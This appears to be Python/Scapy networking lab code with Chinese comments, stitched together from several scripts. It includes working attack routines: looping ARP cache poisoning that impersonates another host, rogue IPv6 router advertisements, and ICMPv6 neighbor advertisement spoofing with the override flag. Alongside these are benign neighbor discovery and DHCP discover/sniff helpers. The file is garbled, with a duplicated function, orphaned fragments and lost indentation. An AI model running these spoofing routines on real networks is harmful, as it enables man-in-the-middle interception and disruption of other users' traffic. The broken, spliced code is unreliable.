def icmpv6_rs(ifname):
ll_mac = get_mac_address(ifname) # 获取本机接口MAC地址
# -----------IPv6头部------------
# Next Header: 0x3A (ICMPv6)
# 原地址: Link Local address
# 目的地址: FF02::2(所有路由器)
# 可以省略 src=mac_to_ipv6_linklocal(ll_mac) 来提高效率
base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::2')
# ----------ICMPv6头部----------
# ICMPv6 Type: 133
# ICMPv6 Code: 0 (RS)
router_solicitation = ICMPv6ND_RS()
# ----Source Link-Layer Address----
# 源地址: 00:50:56:AB:25:08(本地MAC地址)
src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
# 构建数据包
# packet = base / router_solicitation / src_ll_addr
# 最简单的构建方案
packet = IPv6() / ICMPv6ND_RS()
# packet.show()
# 发送数据包,接受返回数据包
result = sr1(packet, timeout=2, verbose=False)
# result.show()
# 提取返回数据包中的网关MAC
print("gwmac: ", result.getlayer("ICMPv6 Neighbor Discovery Option - Source Link-Layer Address").fields['lladdr'])
# 提取返回数据包中的MTU
print("mtu: ", result.getlayer("ICMPv6 Neighbor Discovery Option - MTU").fields['mtu'])
# 提取返回数据包中的Prefix信息
print("prefix: ", result.getlayer("ICMPv6 Neighbor Discovery Option - Prefix Information").fields['prefix'])
def icmpv6_ra(ifname):
# 提取本地MAC
ll_mac = get_mac_address(ifname)
# -----------IPv6头部------------
# Next Header: 0x3A (ICMPv6)
# 原地址: Link Local address
# 目的地址: FF02::1(所有节点)
# 可以省略mac_to_ipv6_linklocal(ll_mac) 来提高效率
base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::1')
# ----------ICMPv6头部----------
# ICMPv6 Type: 134
# ICMPv6 Code: 0 (RA)
router_solicitation = ICMPv6ND_RA()
# ----Source Link-Layer Address----
# 源地址: 00:50:56:AB:4D:19(路由器MAC地址),本次为欺骗,所以MAC地址是本地MAC地址
src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
# 提供MTU
mtu = ICMPv6NDOptMTU(mtu=1500)
# 提供前缀
prefix = ICMPv6NDOptPrefixInfo(prefix='2001:2::', prefixlen=64)
# 构建数据包
packet = base / router_solicitation / src_ll_addr / mtu / prefix
# packet.show()
# 一直发送,知道客户使用Ctrl + C终止
while True:
try:
time.sleep(1)
send(packet, verbose=False)
print('发送RA数据包')
except KeyboardInterrupt:
print('退出!')
def arp_spoof(ip_1, ip_2, ifname='Net1'):
global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname # 申明全局变量
g_ip_1 = ip_1 # 为全局变量赋值,g_ip_1为被毒化ARP设备的IP地址
g_ip_2 = ip_2 # 为全局变量赋值,g_ip_2为本机伪装设备的IP地址
g_ifname = ifname # 为全局变量赋值,攻击使用的接口名字
# 获取本机IP地址,并且赋值到全局变量localip
localip = get_ip_address(ifname)
# 获取本机MAC地址,并且赋值到全局变量localmac
localmac = get_mac_address(ifname)
# 获取ip_1的真实MAC地址
ip_1_mac = arp_request(ip_1, ifname)[1]
# 获取ip_2的真实MAC地址
ip_2_mac = arp_request(ip_2, ifname)[1]
# 引入信号处理机制,如果出现ctl+c(signal.SIGINT),使用sigint_handler这个方法进行处理
signal.signal(signal.SIGINT, sigint_handler)
while True: # 一直攻击,直到ctl+c出现!!!
# op=2,响应ARP
sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(
op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
iface=scapy_iface(g_ifname),
verbose=False)
# op=1,请求ARP
# sendp(Ether(src=localmac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
# iface = g_ifname, verbose = False)
# 以太网头部的src MAC地址与ARP数据部分的hwsrc MAC不匹配攻击效果相同
# sendp(Ether(src=ip_1_mac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
# iface = g_ifname, verbose = False)
# 如果采用dst为二层广播,会造成被伪装设备告警地址重叠,并且欺骗效果不稳定,容易抖动!
print("发送ARP欺骗数据包!欺骗" + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!')
time.sleep(1)
def icmpv6_na(spoof_host, masquerade_host, ifname): # 发送NA主要用于毒化
ll_mac = get_mac_address(ifname) # 获取本机接口MAC地址
# ----------以太网头部 - ---------
# 以太网协议号: 0x86DD(IPv6)
# 源目MAC为两个节点的单播地址
# 源为系统本地MAC,Scapy自动产生,目标MAC为被欺骗主机MAC,使用NS获取
dst_mac = icmpv6_ns(spoof_host, ifname)
ether = Ether(dst=dst_mac)
# -----------IPv6头部------------
# Next Header: 0x3A (ICMPv6)
# 原地址: 2001:1::200 伪装地址
# 目的地址: 2001:1::253的Link Local Address,欺骗主机的Link Local Address
ipv6 = IPv6(src=masquerade_host, dst=mac_to_ipv6_linklocal(dst_mac))
# R=1 Sender is a router,
# S=1 advertisement is sent in response to a Neighbor Solicit,
# O=1 override flag
# 目标地址: 2001:1::200 伪装地址
neighbor_advertisements = ICMPv6ND_NA(
tgt=masquerade_host,
R=0, # 我不是路由器
S=0, # 我不是一个NS的响应
O=1) # 我要覆盖
# ----Target Link-Layer Address----
# 源地址: 本地MAC地址
src_ll_addr = ICMPv6NDOptDstLLAddr(lladdr=ll_mac)
# 构建完整数据包
packet = ether / ipv6 / neighbor_advertisements / src_ll_addr
# 发送数据包
sendp(packet, verbose=False)
def icmpv6_ns(host, ifname): # 请求特定IPv6地址的MAC地址
ll_mac = get_mac_address(ifname) # 获取本机接口MAC地址
# 构建icmpv6_ns数据包
# -----------IPv6头部 - -----------
# Next Header: 0x3A(ICMPv6)
# 原地址: Link Local address
# 目的地址: Solicited node multicast address # 请求节点组播地址
#
# ----------ICMPv6头部 - ---------
# ICMPv6 Type: 135
# ICMPv6 Code: 0(NS)
# 目标地址: 2001:1::253
#
# ----Source Link-Layer Address - ---
# 源地址: 00:50:56:AB:25:08(本地MAC地址)
# 所有可选都填写
# packet = IPv6(src=mac_to_ipv6_linklocal(ll_mac),
# dst=solicited_node_multicast_address(host)) / ICMPv6ND_NS(tgt=host) / ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
# 下面是最精简
# 系统自动产生, IPv6头部(linklocal地址, 请求节点组播地址(并且转换到组播MAC))
# 没有ICMPv6NDOptSrcLLAddr头部一样正常工作
packet = IPv6() / ICMPv6ND_NS(tgt=host)
# packet.show()
# 发送数据包
result = sr1(packet, timeout=2, verbose=False)
# 提取返回的MAC地址
# result.show()
return result.getlayer(
"ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
).fields['lladdr']
def arp_spoof(ip_1, ip_2, ifname='ZlineNET1'):
global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname #
g_ip_1 = ip_1 #被毒化arp设备的ip设备
g_ip_2 = ip_2 #本机伪装设备的ip
g_ifname = ifname #攻击使用的接口
#获取本机ip和mac
localip = get_ip_address(ifname)
localmac = get_mac_address(ifname)
#获取被攻击的目标的mac
ip_1_mac = arp_request(ip_1, ifname)[1]
#获取伪装设备的mac
signal.signal(signal.SIGINT, sigint_handler)
while True:
sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(
op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
iface=g_ifname,
verbose=False)
print('发送ARP欺骗数据包!欺骗' + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!!')
time.sleep(1)
print('%-15s ==> %s' % (str(option[0]), str(option[1])))
elif pkt.getlayer(DHCP).fields['options'][0][1] == 5: # 发现并且打印DHCP ACK
print('发现DHCP ACK包,确认的IP为:' + pkt.getlayer(BOOTP).fields['yiaddr'])
print('ACK包中发现如下Options:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
# 打印DHCP ACK的所有选项
print('%-15s ==> %s' % (str(option[0]), str(option[1])))
except Exception as e:
print(e)
pass
def dhcp_full(ifname, mac_address, timeout=3):
global global_if
global_if = ifname
# 发送DHCP Discover数据包
pool.apply_async(dhcp_discover_sendonly, args=(global_if, mac_address))
# 侦听数据包,使用过滤器filter="port 68 and port 67"进行过滤,把捕获的数据包发送给DHCP_Monitor_Control函数进行处理
sniff(prn=dhcp_monitor_control,
filter="port 68 and port 67",
store=0,
iface=scapy_iface(global_if),
timeout=timeout)
if __name__ == '__main__':
# 使用Linux解释器 & WIN解释器
dhcp_full('Net1', get_mac_address('Net1'))
# MAC地址只有6个字节,所以需要把剩余部分填充b'\x00'
return info + b'\x00' * (16 - len(info))
def dhcp_discover_sendonly(ifname, mac_address, wait_time=1):
bytes_mac = change_mac_to_bytes(mac_address) # 把MAC地址转换为二进制格式
# param_req_list为请求的参数,没有这个部分服务器只会回送IP地址,什么参数都不给
discover = Ether(dst='ff:ff:ff:ff:ff:ff',
src=mac_address,
type=0x0800) / IP(src='0.0.0.0',
dst='255.255.255.255') \
/ UDP(dport=67,
sport=68) \
/ BOOTP(op=1,
chaddr=chaddr(bytes_mac)) \
/ DHCP(options=[('message-type', 'discover'),
('param_req_list', bytes_requested_options),
'end'])
if wait_time != 0:
time.sleep(wait_time)
sendp(discover, iface=scapy_iface(ifname), verbose=False)
else:
sendp(discover, iface=scapy_iface(ifname), verbose=False)
if __name__ == '__main__':
# 使用Linux解释器 & WIN解释器
local_mac = get_mac_address('Net1')
dhcp_discover_sendonly('Net1', local_mac)